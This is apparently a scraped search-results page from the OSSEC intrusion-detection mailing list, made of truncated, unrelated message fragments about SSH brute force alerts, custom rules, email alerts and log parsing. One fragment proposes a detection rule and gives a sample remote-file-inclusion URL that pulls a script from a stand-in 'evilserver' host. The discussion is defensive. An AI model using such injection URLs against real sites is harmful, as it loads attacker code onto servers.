We've got a machine running FreeBSD 6.2 and Ossec 1.6 and I'm seeing a
whole heap of SSH brute force attacks occurring on it. Ossec is
emailing me all of the attempts and adding the offending IP to the end
of FreeBSD's hosts.allow file.
This machine lets me and the team SSH from anywhere and so
Thank you Peter and Daniel.
I will give it a go.
Cheers.
Andy
On Oct 10, 5:48 am, Daniel Cid [EMAIL PROTECTED] wrote:
Hi Andy,
You can also use the hostname tag in the rules to match on the log file
name:
rule id=12 level=13
match$HACK_ATTEMPT/match
hostname/var/spool/mail
Hi,
We're currently running version 1.4.
Is there any problems with upgrading from 1.4 straight to 1.6?
Thanks.
Andy
Hi All,
We've had some recent joomla and mambo exploits on our web server
through applets that customers can add/install themselves. We've been
able to trace some activity back to the /var/spool/mail/apache file
and I've added this file for ossec to monitor. I've placed a rule in
local_rules.xml
Dear all,
I wish to know how to increase frequency of sending raw log from agent
to ossec server.
thank you in advance ;-)
Panom N.
Dear all,
Is it possible to monitor mandrake Linux log?. I could not see
mandrake in the platforms/operating systems supported page.
thank you in advance ;-)
Panom N.
Dear all,
Please help me on how to provide high availability, active-active or
active-standby, to OSSEC solution. I need to focus on client
server ;-)
thank you in advance
Panom N.
accept parsed logs as evidence).
Please let me know.
Thanks.
On Nov 15, 2007 9:01 AM, Aaron Bliss [EMAIL PROTECTED] wrote:
It looks like I'm receiving events from the remote syslog host, I just
didn't realize that I need to configure e-mail alerts for the remote
host as well. So again
sudo apt-get install build-essential
Shige wrote:
Hello guys, i need some help.
first of all im a begginer using ossec
Im trying to install ossec-hids in a machine SO Ubuntu 6.06 but when i
finish the instalation an error occurred:
./install.sh: Line 85: make: command not found
Error
Thanks heap...i should have spotted that myself :)
Thanks for your help Daniel.
OSSEC is a great product so keep up the good work!
. That's why it
was written for :)
Thanks,
--
Daniel B. Cid
dcid ( at ) ossec.net
On 10/10/07, Wilson Lai [EMAIL PROTECTED] wrote:
Dear ALL,
I have now installed the Syslog-NG server for centralizing all
syslog messages from windows
and linux machines. And now, I am looking
Hi There,
We've installed OSSEC as a local install on every server so far and
did not use the server/agent model. This might have been a bad move
because we have all our servers running a local install of OSSEC and
we want to now have a central management system so that white lists
can easily be
Hi There,
Just fine tuning OSSEC and need a bit of help understanding why a
particular rule was fired to trigger Active Response.
Turns out that we like Peter's idea of just firing Active Repsonse
based on the rules we set.
Atleast this way we know which rules are being match to trigger Active
Thank you Daniel...
Works great !!
Thanks for the explaination Daniel.
Although it's good to enable active response for just the rules you
want - is there a way to do the opposite that allows you to add a rule
that won't fire off active response (like an exception list).
For example I am getting a lot of web customers who have embedded
javascript code in their HTML
Yes it is.
Try adding something like this to your ossec.conf file.
email_alerts
email_to[EMAIL PROTECTED],[EMAIL PROTECTED]/email_to
rule_id12/rule_id
do_not_delay /
do_not_group /
/email_alerts
On Sep 21, 5:08 pm, Verlag Neue Stadt [EMAIL PROTECTED] wrote:
Hello
Adding to this discussion, is it possible to have one particular rule
ID email me at [EMAIL PROTECTED] and not email the default email
address [EMAIL PROTECTED]
I've applied the following rules below to ossec.conf and it's working
ok but I'm getting two emails - one is sent to [EMAIL PROTECTED
build-essential
Thomas Wagner wrote:
I've a new etch image. Many faults I get during the installation of
ossec. I guess some tools are and libs are missing. Can you tell me
which are nessesary for ossec?
thanks
tom
Hi...
I posted on here about my ProFTPD problem a week or so ago but it did
not appear in the discussion list.
Is there a way to make OSSEC less sensitive with ProFTPD logs?
What I've found is that when a user FTP's to our web server and uses
the correct/valid username but types the password
[**]
[Priority: 3]
09/06-12:38:49.408268 74.230.55.39:50557 - 172.19.255.3:80
TCP TTL:113 TOS:0x0 ID:63541 IpLen:20 DgmLen:1400 DF
***A Seq: 0x7F99D7C5 Ack: 0x57936D25 Win: 0x4A60 TcpLen: 20
On Aug 31, 1:03 pm, Zachary Roetemeyer [EMAIL PROTECTED] wrote:
I am launching two instances of snort
Refer to this thread about a similar discussion:
http://groups.google.com/group/ossec-list/browse_thread/thread/f78e998efb3c108b
Below is a snip from the thread above which shows you the sequence
numbers.
Here I have enabled service sequence-numbers on the router. From the
log file, you can
Because I can't get Ossec to properly work with Cisco IOS logs I've
opted to use local_rules.xml and place my rules in there.
rule id=12 level=5
match%SYS-5-CONFIG_I/match
descriptionConfiguration change detected./description
/rule
rule id=13 level=7
I'd say false positive as the package flex installs libfl.so to
/usr/lib, but you can check your md5 hash against mine, I'm running etch
with flex 2.5.33-11 installed.
:~$ stat /usr/lib/libfl.so
File: `/usr/lib/libfl.so'
Size: 773 Blocks: 8 IO Block: 4096 regular
i want log in OSSEC (in alert.log)
/var/log/kern.log
Jan 31 21:52:55 gatlan kernel: DROP
TRACEROUTE IN=ppp0 OUT= MAC= SRC="" DST=90.20.131.158 LEN=80
TOS=0x00 PREC=0xC0 TTL=248 ID=3575 PROTO=ICMP TYPE=3 CODE=1
[SRC="" DST=192.168.1.64 LEN=52 TOS=0x00 PREC=0x00 TTL=54
ID=8857 DF PROTO=TCP
I have a problem when OSSEC log iptables log
Feb 1 17:47:41 gatlan kernel: DROP
ICMP_ERROR IN=ppp0 OUT= MAC= SRC="" DST=90.20.131.158
LEN=94 TOS=0x00 PREC=0x00 TTL=44 ID=59875 PROTO=ICMP TYPE=3 CODE=1
[SRC="" DST=192.168.11.2 LEN=66 TOS=0x00 PREC=0x00 TTL=43
ID=47914 PROTO=UDP SPT=9689
Rafael Capovilla a écrit :
What do you mean?
firewall-drop.sh works just fine with iptables/pf/ipfw
no, a iptables who log and work with OSSEC (just a sample) (like apache,
syslog...)
2007/1/25, [EMAIL PROTECTED] mailto:[EMAIL PROTECTED]
[EMAIL PROTECTED] mailto:[EMAIL PROTECTED
Hello, it's possible to have a sample script for iptables worked on OSSEC?
[EMAIL PROTECTED] a écrit :
[EMAIL PROTECTED] a écrit :
on web_rules.xml (add ~ line 46)
url%3A|%2F|:|//url
for block as a XSS attack or a SQL attack log type:
http://mywebsite.com/vulnerable_script.php?include=http://evilserver.com/evil_script.txt
http://mywebsite.com
hello,
I have a problem with Apache2 Access Log, (but not with Error Log)
/* ossec.conf
localfile
log_formatapache/log_format
location/var/log/apache2/access_mywebsite.com.log/location
/localfile
*/
---
/* /var/log/apache2/access_mywebsite.com.log (right: root:root)
123.123.123.123 -
whatever rogue process that binds to
it can be configured so that it only syn-ack's to a specific IP, or
require specific packets.
I'd still push my tcpdump method, watching for any outgoing traffic
that shouldn't be there.
On Jan 18, 10:06 pm, Thorne Lawler [EMAIL PROTECTED] wrote:
Edvin,
I
32 matches
Mail list logo